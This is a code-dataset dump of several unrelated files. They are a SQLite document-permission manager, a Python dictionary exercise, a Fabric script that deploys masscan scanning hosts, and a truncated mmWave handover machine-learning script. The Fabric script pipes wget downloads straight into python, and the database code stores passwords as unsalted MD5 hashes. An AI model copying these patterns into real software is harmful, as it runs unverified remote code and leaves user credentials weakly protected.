]\n","sub_path":"production/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"566906961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nскрипт для работы с базой данных\nдобавление, удаление, изменение прав документа\nдобавление, удаление пользователя\n\"\"\"\nimport sqlite3\nimport datetime\n\nfrom Crypto.Hash import MD5\nfrom Crypto.PublicKey import RSA\n\n\nclass Database:\n users = []\n documents = []\n\n def __init__(self):\n self.con = sqlite3.connect('Petrel.db')\n self.cur = self.con.cursor()\n self.cur.execute('SELECT * FROM users')\n for row in self.cur:\n self.users.append(row[1])\n self.cur.execute('SELECT * FROM files')\n for row in self.cur:\n self.documents.append(row[1])\n\n def addDocument(self, filename, owner):\n self.documents.append(filename)\n # посчитаем, сколько документов имеют такое имя\n self.cur.execute(\"SELECT filename FROM files \"\n \"WHERE filename = ?;\", [filename])\n count = 0\n for row in self.cur:\n count += 1\n # print(count)\n # создадим добавим документ только в том случае, если\n # документа с именем нет в системе\n if count == 0:\n self.cur.execute(\"INSERT INTO files \"\n \"(filename, owner, sign, date)\"\n \"VALUES (?,?,?,?)\",\n [filename, owner, \"-\", str(datetime.datetime.now())])\n for user in self.users:\n if user != owner:\n # для всех остальных будет право N\n self.cur.execute(\"INSERT INTO hru \"\n \"(filename, user, right)\"\n \"VALUES (?,?,?);\",\n [filename, user, \"n\"])\n self.con.commit()\n else:\n # для пользователя будет право O\n self.cur.execute(\"INSERT INTO hru \"\n \"(filename, user, right)\"\n \"VALUES (?,?,?);\",\n [filename, user, \"o\"])\n self.con.commit()\n return (0, \"File \" + filename + \" added\")\n else:\n return (1, \"Document with name \" + filename +\n \" currently exists in system\")\n\n # удаление файла с именем filename при сеансе currentUser\n def deleteDocument(self, filename, currentUser):\n self.cur.execute(\"SELECT owner FROM files \"\n \"WHERE filename = ?;\",\n [filename])\n fileOwner = \"\"\n for row in self.cur:\n fileOwner = row[0]\n if fileOwner == currentUser:\n self.cur.execute(\"DELETE FROM files WHERE filename = ?\",\n [filename])\n self.cur.execute(\"DELETE FROM hru WHERE filename = ?\",\n [filename])\n self.con.commit()\n # TODO добавить скрипт физического удаления файла\n return 0, \"File deleted\"\n else:\n return 1, \"You're not owner, you can't delete this document\"\n\n def isDocumentAvailable(self, currentUser, filename):\n availableDocs = self.availableDocumentsList(currentUser)\n if filename in availableDocs:\n return 0\n else:\n return 1\n\n def availableDocumentsList(self,currentUser):\n self.cur.execute(\"SELECT filename FROM hru \"\n \"WHERE user = ? AND\"\n \"(right = ? OR right = ?);\",\n [currentUser, \"s\", \"o\"])\n availableDocs= []\n for row in self.cur:\n availableDocs.append(row[0])\n return availableDocs\n\n def addUser(self, user, password):\n self.users.append(user)\n hash = MD5.new()\n hash.update(password.encode())\n # Записываем в таблицу с пользователями выданный логин-пароль\n self.cur.execute(\"INSERT INTO users (login, md5pass) \"\n \"VALUES (?, ?);\",\n [user, sqlite3.Binary(hash.digest())])\n self.con.commit()\n # генерируем открытый и закрытый ключи\n key = RSA.generate(2048)\n f = open('storage/private/' + user + '.pem', 'wb')\n f.write(key.exportKey(\"PEM\"))\n f.close()\n f = open('storage/public/' + user + '.pem', 'wb')\n f.write(key.publickey().exportKey(\"PEM\"))\n f.close()\n # в матрице ХРУ для всех файлов записываем право n\n for doc in self.documents:\n self.cur.execute(\"INSERT INTO hru \"\n \"(filename, user, right)\"\n \"VALUES (?,?,?);\",\n [doc, user, \"n\"])\n self.con.commit()\n\n def deleteUser(self, user, deleteFiles=False):\n if user not in self.users:\n print(\"not existing user\")\n return\n self.cur.execute(\"DELETE FROM hru WHERE user = ?\",\n [user])\n self.con.commit()\n self.cur.execute(\"DELETE FROM users WHERE login = ?\",\n [user])\n self.con.commit()\n if deleteFiles:\n filenamesToDelete = []\n self.cur.execute(\"SELECT filename FROM files \"\n \"WHERE OWNER = ?\",\n [user])\n for row in self.cur:\n self.cur.execute(\"DELETE FROM files WHERE filename = ?\",\n [row[0]])\n self.con.commit()\n # TODO добавить скрипт физического удаления файла\n\n # залогинясь под пользователем currentUser, изменить\n # право для пользователя user на right для файла filename\n def changeRight(self, currentUser, filename, right, user):\n if (user not in self.users) or (filename not in self.documents) or \\\n (user not in self.users) or (right not in [\"s\", \"n\"]):\n return 1, \"Not existing user or document or right\"\n self.cur.execute(\"SELECT owner FROM files \"\n \"WHERE filename = ?;\",\n [filename])\n owner = \"\"\n for row in self.cur:\n owner = row[0]\n if owner == currentUser:\n self.cur.execute(\"UPDATE hru SET \"\n \"right = ? \"\n \"WHERE user = ? AND filename = ?;\",\n [right, user, filename])\n self.con.commit()\n return 0, \"You've changed right of \"+ filename+\" for \"+ user\n else:\n return 1, \"You're not owner of this file\"\n\n\n def isUserOrFileExist(self,user,filename):\n if (user in self.users) and (filename in self.documents):\n return 0, \"user or document exist\"\n else:\n return 1, \"not existing user or document\"\n\n def isUserOwnerOfDocument(self,user, filename):\n owner = self.getOwner(filename)\n if owner == user:\n return 0, \"You're owner of this document\"\n else:\n return 1, \"You're not owner of this document\"\n\n\n def isDocumentSigned(self,user,filename):\n currentSign = self.getSign(filename)\n if currentSign == \"-\":\n return 0, \"Document is not signed\"\n else:\n return 1, \"Document signed\"\n\n def getSign(self,filename):\n self.cur.execute(\"SELECT sign FROM files \"\n \"WHERE filename = ?;\",\n [filename])\n currentSign = \"\"\n for row in self.cur:\n currentSign = row[0]\n return currentSign\n\n def getOwner(self,filename):\n self.cur.execute(\"SELECT owner FROM files \"\n \"WHERE filename = ?;\",\n [filename])\n owner = \"\"\n for row in self.cur:\n owner = row[0]\n return owner\n\n def signDocument(self, user, filename, sign):\n self.cur.execute(\"UPDATE files SET \"\n \"sign = ? \"\n \"WHERE owner = ? AND filename = ?;\",\n [sign, user, filename])\n self.con.commit()\n return 0, \"You signed this document\"\n","sub_path":"Server/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":8695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"73655873","text":"# 练习1:将两个列表,合并为一个字典\n# \t\t姓名列表[\"张无忌\",\"赵敏\",\"周芷若\"]\n# \t\t房间列表[101,102,103]\n\n# 练习2:颠倒练习1字典键值\nlist_names = [\"张无忌\", \"赵敏\", \"周芷若\"]\nlist_rooms = [101, 102, 103]\n\n# dict_infos = {}\n# for i in range(len(list_names)):\n# # list_rooms[i] 作为key\n# # list_names[i] 作为value\n# dict_infos[list_rooms[i]] = list_names[i]\n# print(dict_infos)\n\ndict_infos = {list_rooms[i]: list_names[i]\n for i in range(len(list_names))\n }\n\nresult = {v: k for k, v in dict_infos.items()}\n\nprint(dict_infos)\nprint(result)\n","sub_path":"month_01/teacher/day06/exercise07.py","file_name":"exercise07.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"590163471","text":"import tempfile\nimport shutil\nimport os\n\nfrom fabric.api import *\n\nenv.use_ssh_config = True\n\nDEBS = ['emacs23-nox',\n 'unattended-upgrades',\n 'ntp', # turns out to be more important than you'd think\n 'collectd',\n 'nginx',\n 'libhiredis*',\n 'ethtool',\n ]\n\n@task\ndef install_debs():\n \"Install and upgrade debian dependencies.\"\n sudo('apt-get update')\n sudo('apt-get dist-upgrade -y')\n sudo('apt-get install -y ' + ' '.join(DEBS))\n sudo('apt-get autoremove -y')\n\n@task\ndef configure_upgrades():\n \"Configure unattended upgrades\"\n put('configs/50unattended-upgrades',\n '/etc/apt/apt.conf.d/50unattended-upgrades',\n use_sudo=True)\n put('configs/unattended-upgrades-10periodic',\n '/etc/apt/apt.conf.d/10periodic',\n use_sudo=True)\n\n@task\ndef set_timezone():\n \"Set timezone to Etc/UTC.\"\n sudo('echo \"Etc/UTC\" > /etc/timezone')\n sudo('dpkg-reconfigure -f noninteractive tzdata')\n\n@task\ndef install_pip():\n \"Install latest setuptools and pip.\"\n sudo('wget https://bitbucket.org/pypa/setuptools/raw/bootstrap/'\n 'ez_setup.py -O - | python')\n run('rm setuptools-*.tar.gz')\n sudo('wget https://raw.github.com/pypa/pip/master/contrib/'\n 'get-pip.py -O - | python')\n\n@task\ndef install_tasa():\n \"Install tasa.\"\n sudo('pip install -U tasa')\n\n@task\ndef configure_tasa():\n \"Configure tasa.\"\n sudo('mkdir -p /etc/tasa')\n put('configs/tasa.conf', '/etc/tasa/tasa.conf')\n\n@task\ndef configure_collectd():\n \"Configure collectd\"\n put('configs/collectd.conf', '/etc/collectd/collectd.conf', use_sudo=True)\n sudo('service collectd restart')\n\n@task\ndef configure_nginx():\n \"Configure nginx\"\n sudo('rm /etc/nginx/sites-enabled/*')\n put('configs/optout.nginx',\n '/etc/nginx/sites-enabled/optout',\n use_sudo=True)\n sudo('mkdir -p /usr/share/nginx/www')\n put('configs/optout.html',\n '/usr/share/nginx/www/index.html')\n sudo('service nginx restart')\n\n@task\n@runs_once # do this once, locally\ndef compile_masscan():\n \"Download and compile latest masscan\"\n try:\n os.remove('masscan')\n except OSError:\n pass\n local('sudo apt-get install -y build-essential libpcap-dev')\n tempdir = tempfile.mkdtemp()\n with lcd(tempdir):\n local('git clone https://github.com/robertdavidgraham/masscan')\n with lcd('masscan'):\n local('make')\n local('make regress')\n shutil.move(os.path.join(tempdir, 'masscan/bin/masscan'),\n '.')\n shutil.rmtree(tempdir)\n\n@task\ndef configure_masscan():\n \"Copy masscan configuration\"\n sudo('mkdir -p /etc/masscan')\n put('configs/masscan.conf', '/etc/masscan/masscan.conf',\n use_sudo=True)\n put('configs/excludes.txt', '/etc/masscan/excludes.txt',\n use_sudo=True)\n put('configs/masscan.upstart', '/etc/init/masscan.conf',\n use_sudo=True)\n sudo('service masscan restart', warn_only=True)\n\n@task\ndef copy_masscan():\n \"Copy the masscan binary to remote\"\n put('masscan', '/usr/local/bin/masscan',\n use_sudo=True, mirror_local_mode=True)\n\n@task\ndef install_masscan():\n \"Compile masscan locally and install remotely\"\n compile_masscan()\n copy_masscan()\n configure_masscan()\n # don't worry about cleaning up the local masscan binary\n\n@task\ndef reboot():\n \"Reboot. Doesn't wait.\"\n sudo('shutdown -r 0')\n\n@task(default=True)\ndef configure_survey():\n \"Run all configuration to set up survey slave\"\n install_masscan() # do this first because it uses local sudo\n\n install_debs()\n configure_upgrades()\n set_timezone()\n install_pip()\n install_tasa()\n configure_collectd()\n configure_nginx()\n\n reboot()\n\n\n@task\ndef check_networking():\n sudo('ethtool -k eth0')\n sudo('ethtook -k eth1')\n","sub_path":"configurator/fabfile/survey.py","file_name":"survey.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"449129519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 16:08:03 2019\n@author: farismismar\n\"\"\"\n\nimport random\nimport os\nimport numpy as np\nimport pandas as pd\nimport math\n\nimport itertools\nimport xgboost as xgb\nfrom sklearn.metrics import roc_auc_score, roc_curve\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import confusion_matrix\n\n\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import roc_auc_score, roc_curve\nfrom sklearn.metrics import confusion_matrix\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tick\nfrom matplotlib.ticker import MultipleLocator, FuncFormatter\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport matplotlib2tikz\n\nos.chdir('/Users/farismismar/Desktop/DeepMIMO')\n# 0) Some parameters\nseed = 0\nK_fold = 2\nlearning_rate = 0.05\nmax_users = 54481\nr_exploitation = 0.8\np_blockage = 0.4\n\np_randomness = 0.3 # 0 = all users start in 3.5\n\n# in Mbps\nrate_threshold_sub6 = 1.72 # median\nrate_threshold_mmWave = 7.00\n\ntraining_request_handover_threshold = np.inf #(1 - p_randomness) * rate_threshold_sub6 + p_randomness * rate_threshold_mmWave # this is x_hr, but only for the training data.\nrequest_handover_threshold = (1 - p_randomness) * rate_threshold_sub6 + p_randomness * rate_threshold_mmWave # this is x_hr\n\n# in ms\ngap_fraction = 0.6 # rho\n\n# in Watts\nPTX_35 = 1 # in Watts for 3.5 GHz\nPTX_28 = 1 # in Watts for 28 GHz\n\n# speed:\nv_s = 50 # km/h not pedestrian, but vehicular speeds.\n\ndelta_f_35 = 180e3 # Hz/PRB\ndelta_f_28 = 180e3 # Hz/PRB\nN_SC_35 = 1\nN_SC_28 = 1\n\nmmWave_BW_multiplier = 10 # x sub-6\nB_35 = N_SC_35 * delta_f_35\nB_28 = N_SC_28 * delta_f_28 * mmWave_BW_multiplier\nNf = 7 # dB noise fig.\n\nk_B = 1.38e-23 # Boltzmann\nT = 290 # Kelvins\n\nN_exploit = int(r_exploitation * max_users)\n\n# 1) Read the data\n# Add a few lines to caputre the seed for reproducibility.\nrandom.seed(seed)\nnp.random.seed(seed)\n\ndef create_dataset():\n # Takes the three.csv files and merges them in a way that is useful for the Deep Learning.\n # regenerate the dataset for 3.5 (y,z = 8x4) and 28 (y, z = 64x4)\n df35 = pd.read_csv('dataset/dataset_3.5_GHz.csv')\n df28_b = pd.read_csv('dataset/dataset_28_GHz_blockage.csv')\n df28_nb = pd.read_csv('dataset/dataset_28_GHz.csv')\n \n # Truncate to the first max_users rows, for efficiency for now\n df35 = df35.iloc[:max_users,:]\n df28_b = df28_b.iloc[:max_users,:]\n df28_nb = df28_nb.iloc[:max_users,:]\n \n sub6_Y, sub6_Z = 8, 4\n mmWave_Y, mmWave_Z = 64, 4\n \n # Check that distances are similar\n assert(np.all(df28_b.iloc[:,-3:] == df28_nb.iloc[:,-3:]))\n \n # Based on blocking probability, create df28.\n p_b = np.random.binomial(1, p=p_blockage, size=max_users)\n df28 = df28_b.copy()\n df28.loc[(p_b==1),:] = df28_b.loc[(p_b == 1),:]\n df28.loc[(p_b==0),:] = df28_nb.loc[(p_b == 0),:]\n \n # Map: 0 is ID; 1-YZ+1 are H real; YZ+1-2YZ+1 are Himag; last three are x,y,z \n # 2) Perform data wrangling and construct the proper channel matrix H\n H35_real = df35.iloc[:,1:(sub6_Y*sub6_Z+1)]\n H35_imag = df35.iloc[:,(sub6_Y*sub6_Z+1):(2*sub6_Y*sub6_Z+1)]\n H35_loc = df35.iloc[:,-3:]\n \n H28_real = df28.iloc[:,1:(mmWave_Y*mmWave_Z+1)]\n H28_imag = df28.iloc[:,(mmWave_Y*sub6_Z+1):(2*mmWave_Y*mmWave_Z+1)]\n H28_loc = df28.iloc[:,-3:] \n \n # Before moving forward, check if the loc at time t is equal\n df35 = df35.rename(columns={df35.columns[-3]: 'lon', \n df35.columns[-2]: 'lat', \n df35.columns[-1]: 'height'})\n\n df28 = df28.rename(columns={df28.columns[-3]: 'lon', \n df28.columns[-2]: 'lat', \n df28.columns[-1]: 'height'})\n \n assert(np.all(df35.iloc[:,-3:] == df28.iloc[:,-3:]))\n \n # Reset the column names of the imaginary H\n H35_imag.columns = H35_real.columns\n H28_imag.columns = H28_real.columns\n \n H35 = H35_real + 1j * H35_imag\n H28 = H28_real + 1j * H28_imag\n \n del H35_loc, H28_real, H28_imag, H28_loc\n \n F_35 = compute_bf_codebook(My=sub6_Y, Mz=sub6_Z, f_c=3.5e9)\n F_28 = compute_bf_codebook(My=mmWave_Y, Mz=mmWave_Z, f_c=28e9)\n \n channel_gain_35 = []\n channel_gain_28 = []\n \n # Compute the channel gain |h*f|\n # Beamforming is now both vertical and horizontal\n for i in np.arange(max_users):\n h35_i = np.array(H35.iloc[i,:])\n h28_i = np.array(H28.iloc[i,:])\n channel_gain_35.append(compute_optimal_gain_bf_vector(h35_i, F_35))\n channel_gain_28.append(compute_optimal_gain_bf_vector(h28_i, F_28))\n \n # 3) Feature engineering: introduce RSRP mmWave and sub-6 and y\n channel_gain_28 = np.array(channel_gain_28).astype(float)\n channel_gain_35 = np.array(channel_gain_35).astype(float)\n \n # Get rid of unwanted columns in 3.5\n df35 = df35[['0', 'lon', 'lat', 'height']]\n df35.columns = ['user_id', 'lon', 'lat', 'height']\n\n df = df35.copy() \n df.loc[:,'P_RX_35'] = 10*np.log10(PTX_35 * 1e3 * channel_gain_35)\n df.loc[:,'P_RX_28'] = 10*np.log10(PTX_28 * 1e3 * channel_gain_28)\n \n df = df.iloc[:max_users,:]\n df = df[['user_id', 'lon', 'lat', 'height', 'P_RX_35', 'P_RX_28']]\n df.to_csv('dataset.csv', index=False)\n \n return df\n\ndef compute_optimal_gain_bf_vector(h, F):\n M, MK = F.shape\n\n max_gain = 0\n\n for code_index in np.arange(MK):\n f_i = F[:,code_index]\n channel_gain = abs(np.vdot(h, f_i)) ** 2\n if (channel_gain > max_gain):\n max_gain = channel_gain\n \n return channel_gain\n \ndef compute_bf_codebook(My, Mz, f_c, k_oversampling=1):\n Fy = np.zeros([My, My*k_oversampling], dtype=complex) # F is M rows by Mk columns, where M corresponds to the antennas in the horizontal direction\n\n theta_y_n = math.pi * np.arange(start=0., stop=1., step=1./(k_oversampling*My))\n\n for n in np.arange(My*k_oversampling):\n f_n = _compute_bf_vector(f_c, theta_y_n[n], My)\n Fy[:,n] = f_n\n \n Fz = np.zeros([Mz, Mz*k_oversampling], dtype=complex) # F is M rows by Mk columns, where M corresponds to the antennas in the horizontal direction\n\n theta_z_n = math.pi * np.arange(start=0., stop=1., step=1./(k_oversampling*Mz))\n\n for n in np.arange(Mz*k_oversampling):\n f_n = _compute_bf_vector(f_c, theta_z_n[n], Mz)\n Fz[:,n] = f_n\n\n F = np.kron(Fz, Fy)\n \n return F\n\ndef _compute_bf_vector(f_c, theta, M_ULA):\n # Create DFT beamforming codebook\n c = 299792458 # speed of light\n wavelength = c / f_c\n \n d = wavelength / 2. # antenna spacing \n k = 2. * math.pi / wavelength\n\n exponent = 1j * k * d * math.cos(theta) * np.arange(M_ULA)\n \n f = 1. / math.sqrt(M_ULA) * np.exp(exponent)\n \n return f\n\ndef get_misclassification_error(y_test, y_pred, y_score):\n cm = confusion_matrix(y_test, y_pred)\n tn, fp, fn, tp = cm.ravel()\n \n mu = (fp + fn) / (fp + fn + tn + tp)\n \n return cm, mu\n\ndef plot_confusion_matrix(y_test, y_pred, y_score):\n # Compute confusion matrix\n # classes = [0,1]\n class_names = ['Deny','Grant']\n normalize = False\n \n cm, _ = get_misclassification_error(y_test, y_pred, y_score)\n np.set_printoptions(precision=2)\n \n # Plot non-normalized confusion matrix\n fig = plt.figure(figsize=(10,9))\n ax = fig.gca()\n ax.set_xticks([-1,0,1])\n ax.set_yticks([-1,0,1])\n\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}']\n \n ax.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues, aspect='auto', origin='lower')\n\n # label the ticks with the respective list entries\n ax.set_xticklabels(['']+class_names)\n ax.set_yticklabels(['']+class_names)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 1.5 if normalize else cm.max() / 2.\n for i, j in itertools.product(np.arange(cm.shape[0]), np.arange(cm.shape[1])):\n ax.text(x=j, y=i, s=format(cm[i, j], fmt),\n horizontalalignment=\"center\", va='center',\n color=\"white\" if cm[i, j] > thresh else \"black\")\n \n plt.xlabel(r'\\textbf{Predicted label}')\n plt.ylabel(r'\\textbf{True label}')\n plt.tight_layout()\n plt.savefig('figures/conf_matrix_{}.pdf'.format(p_randomness), format='pdf')\n\n\ndef _parula_map():\n # https://stackoverflow.com/questions/34859628/has-someone-made-the-parula-colormap-in-matplotlib\n from matplotlib.colors import LinearSegmentedColormap\n \n cm_data = [[0.2081, 0.1663, 0.5292], [0.2116238095, 0.1897809524, 0.5776761905], \n [0.212252381, 0.2137714286, 0.6269714286], [0.2081, 0.2386, 0.6770857143], \n [0.1959047619, 0.2644571429, 0.7279], [0.1707285714, 0.2919380952, \n 0.779247619], [0.1252714286, 0.3242428571, 0.8302714286], \n [0.0591333333, 0.3598333333, 0.8683333333], [0.0116952381, 0.3875095238, \n 0.8819571429], [0.0059571429, 0.4086142857, 0.8828428571], \n [0.0165142857, 0.4266, 0.8786333333], [0.032852381, 0.4430428571, \n 0.8719571429], [0.0498142857, 0.4585714286, 0.8640571429], \n [0.0629333333, 0.4736904762, 0.8554380952], [0.0722666667, 0.4886666667, \n 0.8467], [0.0779428571, 0.5039857143, 0.8383714286], \n [0.079347619, 0.5200238095, 0.8311809524], [0.0749428571, 0.5375428571, \n 0.8262714286], [0.0640571429, 0.5569857143, 0.8239571429], \n [0.0487714286, 0.5772238095, 0.8228285714], [0.0343428571, 0.5965809524, \n 0.819852381], [0.0265, 0.6137, 0.8135], [0.0238904762, 0.6286619048, \n 0.8037619048], [0.0230904762, 0.6417857143, 0.7912666667], \n [0.0227714286, 0.6534857143, 0.7767571429], [0.0266619048, 0.6641952381, \n 0.7607190476], [0.0383714286, 0.6742714286, 0.743552381], \n [0.0589714286, 0.6837571429, 0.7253857143], \n [0.0843, 0.6928333333, 0.7061666667], [0.1132952381, 0.7015, 0.6858571429], \n [0.1452714286, 0.7097571429, 0.6646285714], [0.1801333333, 0.7176571429, \n 0.6424333333], [0.2178285714, 0.7250428571, 0.6192619048], \n [0.2586428571, 0.7317142857, 0.5954285714], [0.3021714286, 0.7376047619, \n 0.5711857143], [0.3481666667, 0.7424333333, 0.5472666667], \n [0.3952571429, 0.7459, 0.5244428571], [0.4420095238, 0.7480809524, \n 0.5033142857], [0.4871238095, 0.7490619048, 0.4839761905], \n [0.5300285714, 0.7491142857, 0.4661142857], [0.5708571429, 0.7485190476, \n 0.4493904762], [0.609852381, 0.7473142857, 0.4336857143], \n [0.6473, 0.7456, 0.4188], [0.6834190476, 0.7434761905, 0.4044333333], \n [0.7184095238, 0.7411333333, 0.3904761905], \n [0.7524857143, 0.7384, 0.3768142857], [0.7858428571, 0.7355666667, \n 0.3632714286], [0.8185047619, 0.7327333333, 0.3497904762], \n [0.8506571429, 0.7299, 0.3360285714], [0.8824333333, 0.7274333333, 0.3217], \n [0.9139333333, 0.7257857143, 0.3062761905], [0.9449571429, 0.7261142857, \n 0.2886428571], [0.9738952381, 0.7313952381, 0.266647619], \n [0.9937714286, 0.7454571429, 0.240347619], [0.9990428571, 0.7653142857, \n 0.2164142857], [0.9955333333, 0.7860571429, 0.196652381], \n [0.988, 0.8066, 0.1793666667], [0.9788571429, 0.8271428571, 0.1633142857], \n [0.9697, 0.8481380952, 0.147452381], [0.9625857143, 0.8705142857, 0.1309], \n [0.9588714286, 0.8949, 0.1132428571], [0.9598238095, 0.9218333333, \n 0.0948380952], [0.9661, 0.9514428571, 0.0755333333], \n [0.9763, 0.9831, 0.0538]]\n \n parula_map = LinearSegmentedColormap.from_list('parula', cm_data)\n \n return parula_map\n\ndef plot_joint_pdf(X, Y):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 30\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n num_bins = 50\n H, X_bin_edges, Y_bin_edges = np.histogram2d(X, Y, bins=(num_bins, num_bins), normed=True)\n for y in np.arange(num_bins):\n H[y,:] = H[y,:] / sum(H[y,:])\n pdf = H / num_bins \n \n ax = plt.gca(projection=\"3d\")\n \n x, y = np.meshgrid(X_bin_edges, Y_bin_edges)\n\n surf = ax.plot_surface(x[:num_bins, :num_bins], y[:num_bins, :num_bins], pdf[:num_bins, :num_bins], cmap=_parula_map(), antialiased=True)\n #cb = fig.colorbar(surf, shrink=0.5)\n ax.view_init(5, 45) # the first param rotates the z axis inwards or outwards the screen. The second is our guy.\n \n # No background color \n ax.xaxis.pane.fill = False\n ax.yaxis.pane.fill = False\n ax.zaxis.pane.fill = False\n \n # Now set color to white (or whatever is \"invisible\")\n ax.xaxis.pane.set_edgecolor('w')\n ax.yaxis.pane.set_edgecolor('w')\n ax.zaxis.pane.set_edgecolor('w')\n\n ax.set_xlabel('3.5 GHz')\n ax.set_ylabel('28 GHz')\n ax.set_zlabel('Joint Throughput pdf')\n\n ax.invert_xaxis()\n ax.invert_yaxis()\n \n ax.set_xlim(int(np.max(X)), 0)\n ax.set_ylim(int(np.max(Y)), 0)\n ax.set_zlim(np.min(pdf), np.max(pdf))\n \n ax.xaxis.labelpad=20\n ax.yaxis.labelpad=20\n ax.zaxis.labelpad=20\n \n plt.xticks([3,2,1,0])\n plt.yticks([15,10,5,0])\n \n plt.tight_layout()\n \n plt.savefig('figures/joint_throughput_pdf_{}.pdf'.format(p_randomness), format='pdf')\n matplotlib2tikz.save('figures/joint_throughput_pdf_{}.tikz'.format(p_randomness))\n\ndef plot_joint_cdf(X, Y):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 30\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n num_bins = 100\n H, X_bin_edges, Y_bin_edges = np.histogram2d(X, Y, bins=(num_bins, num_bins), normed=True)\n for y in np.arange(num_bins):\n H[y,:] = H[y,:] / sum(H[y,:])\n pdf = H / num_bins\n \n cdf = np.zeros((num_bins, num_bins))\n for i in np.arange(num_bins):\n for j in np.arange(num_bins):\n cdf[i,j] = sum(sum(pdf[:(i+1), :(j+1)]))\n\n ax = plt.gca(projection=\"3d\")\n x, y = np.meshgrid(X_bin_edges, Y_bin_edges)\n\n surf = ax.plot_surface(x[:num_bins, :num_bins], y[:num_bins, :num_bins], cdf[:num_bins, :num_bins], cmap=_parula_map(), antialiased=True)\n# cb = fig.colorbar(surf, shrink=0.5)\n ax.view_init(5, 45) # the first param rotates the z axis inwards or outwards the screen. The second is our guy.\n \n # No background color \n ax.xaxis.pane.fill = False\n ax.yaxis.pane.fill = False\n ax.zaxis.pane.fill = False\n \n # Now set color to white (or whatever is \"invisible\")\n ax.xaxis.pane.set_edgecolor('w')\n ax.yaxis.pane.set_edgecolor('w')\n ax.zaxis.pane.set_edgecolor('w')\n\n ax.set_xlabel('3.5 GHz')\n ax.set_ylabel('28 GHz')\n ax.set_zlabel('Joint Throughput CDF')\n \n ax.invert_xaxis()\n ax.invert_yaxis()\n \n ax.set_xlim(int(np.max(X)), 0)\n ax.set_ylim(int(np.max(Y)), 0)\n ax.set_zlim(0,1)\n\n ax.xaxis.labelpad=20\n ax.yaxis.labelpad=20\n ax.zaxis.labelpad=20\n\n plt.xticks([3,2,1,0])\n plt.yticks([15,10,5,0])\n \n plt.tight_layout()\n \n plt.savefig('figures/joint_throughput_cdf_{}.pdf'.format(p_randomness), format='pdf')\n matplotlib2tikz.save('figures/joint_throughput_cdf_{}.tikz'.format(p_randomness))\n\ndef plot_pdf(data1, label1, data2, label2):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['legend.fontsize'] = 'small'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n labels = [label1, label2]\n\n num_bins = 50\n counts, bin_edges = np.histogram(data1, bins=num_bins, density=True)\n pdf = counts #np.cumsum(counts) / counts.sum()\n\n lw = 2 \n plt.xlabel('Coherence time (ms)')\n plt.grid(True, axis='both', which='both')\n ax = fig.gca()\n plot1, = ax.plot(bin_edges[1:], pdf, linewidth=lw)\n ax.set_ylabel('sub-6 Coherence time pdf')\n \n counts, bin_edges = np.histogram(data2, bins=num_bins, density=True)\n pdf = counts #np.cumsum(counts) / counts.sum()\n ax_sec = ax.twinx()\n plot2, = ax_sec.plot(bin_edges[1:], pdf, color='red', linewidth=lw)\n \n plt.legend([plot1, plot2], labels, loc=\"best\")\n ax_sec.set_ylabel('mmWave Coherence time pdf')\n plt.tight_layout()\n plt.savefig('figures/coherence_time_{}.pdf'.format(p_randomness), format='pdf')\n matplotlib2tikz.save('figures/coherence_time_{}.tikz'.format(p_randomness))\n \ndef plot_throughput_cdf(T, filename, legend=True):\n fig = plt.figure(figsize=(10.24, 7.68))\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n matplotlib.rcParams['text.usetex'] = True\n matplotlib.rcParams['font.size'] = 40\n matplotlib.rcParams['xtick.labelsize'] = 'small'\n matplotlib.rcParams['ytick.labelsize'] = 'small'\n matplotlib.rcParams['legend.fontsize'] = 'smaller'\n matplotlib.rcParams['text.latex.preamble'] = [\n r'\\usepackage{amsmath}',\n r'\\usepackage{amssymb}'] \n \n labels = T.columns\n\n num_bins = 50\n\n for data in T:\n data_ = T[data]\n\n counts, bin_edges = np.histogram(data_, bins=num_bins, density=True)\n cdf = np.cumsum(counts) / counts.sum()\n ax = fig.gca()\n if data == 'mmWave only':\n style = 'r-'\n elif data == 